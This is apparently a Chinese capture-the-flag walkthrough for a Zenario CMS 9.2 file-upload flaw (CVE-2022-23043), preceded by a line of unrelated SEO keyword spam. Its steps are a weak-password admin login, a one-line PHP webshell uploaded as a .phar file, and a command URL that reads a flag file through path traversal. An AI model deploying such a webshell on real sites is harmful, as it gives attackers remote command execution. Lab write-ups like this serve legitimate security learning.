织梦万网网站搬家教程,济南网站建设设计公司,百度公司网站推广怎么做,广州技术支持:奇亿网站建设简介
CVE-2022-23043是一个与Zenario CMS 9.2文件上传漏洞相关的安全漏洞。该漏洞被定义为文件的不加限制上传#xff0c;攻击者可以利用这个漏洞上传webshell以执行任意命令。利用这个漏洞的攻击者暂无特定情况。要利用此漏洞#xff0c;攻击者首先需要访问Zenario CMS的管…简介
CVE-2022-23043是一个与Zenario CMS 9.2文件上传漏洞相关的安全漏洞。该漏洞被定义为文件的不加限制上传攻击者可以利用这个漏洞上传webshell以执行任意命令。利用这个漏洞的攻击者暂无特定情况。要利用此漏洞攻击者首先需要访问Zenario CMS的管理后台并通过使用弱口令“admin/adminqwe12”进行登录。
攻击过程
1.打开靶场扫描靶场发现路径admin.php发现登陆页面使用上述账号密码登录
2.登陆进去之后修改配置 修改完成之后点击最底部check again然后点击continue
3.进入首页左上角依次点击按钮【Go to Organizer】-【Configuration】-【File/MIME Types】
创建一个新的可执行文件并保存。 4.按照图中位置点击【Documents】-【Upload documents】-【Public】选择公开 创建一个testshell.phar文件文件内容为
?php system($_GET[1]); phpinfo();?
执行此文件并上传
4.选中上传的文件依次点击【Actions】-【View public link】 5.复制此链接进行访问 6.使用命令请求flag
http://39.106.48.123:18787/public/downloads/p7SPu/testshell.phar?1cat%20../../../../../../../flag 得到flag。
